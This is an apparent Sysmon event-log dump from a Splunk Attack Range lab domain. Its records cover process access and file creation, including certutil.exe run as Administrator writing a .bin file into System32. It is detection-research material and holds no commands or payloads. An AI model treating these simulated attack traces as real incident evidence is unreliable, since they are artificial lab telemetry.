Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6740A3FE3B8B9DD920B1851F1720795,SHA256=2F58E307776D907D3243CEF4896A655D562F0DCD4089971C0E342CB5C113A43B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917524Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:45.728{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917523Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:45.728{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917522Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:45.486{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FAF7E8933A26B56151140661367F042,SHA256=1761A72E185019E867F6AA19FA8EA68104A477ABB702853CBFD295B5E5410C50,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917521Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:41.855{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1501-false10.0.1.12-8000- 23542300x8000000000000000638460Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:45.210{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEE264DF364EEB2D583631BAB90420C6,SHA256=566100E718A8B6E2DA7ED2A4137A614C77A1D443E8356FF0FECDE92BB25660C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638459Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:45.210{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D603042E4D45D0FED1C4BEBFB01CFBA,SHA256=C79BB897656F4FE66005008576623C737C7238358F5EE86001DFBB1F494CFD74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638463Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:46.491{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1826ED834F1186BDA6A2B0A54F030A70,SHA256=997A296A0292D765E0CEA5B9E77CC431B6257443F57EF6A0885CDFECA930A0C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917564Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.728{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917563Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.728{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917562Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.645{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917561Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.645{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917560Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.637{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917559Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.637{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917558Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.637{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917557Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.633{896A638B-B3FA-605B-7A69-00000000AE01}4760ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Windows\System32\2d2a313164ae3a724cc53b0c8e104dd6053f8402.binMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917556Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.579{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917555Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.579{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917554Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.569{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917553Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.568{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917552Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.546{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917551Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.545{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917550Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.545{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917549Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.544{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917548Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.543{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917547Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.538{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917546Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.538{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917545Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.538{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917544Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.537{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917543Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.537{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917542Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.537{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917541Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.536{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917540Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.536{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917539Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.530{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917538Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.529{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917537Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.526{896A638B-B3FA-605B-7B69-00000000AE01}27361780C:\Windows\system32\conhost.exe{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917536Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.517{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B3FA-605B-7B69-00000000AE01}2736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917535Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.514{896A638B-B8DD-6058-9202-00000000AE01}36325864C:\Windows\system32\csrss.exe{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917534Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 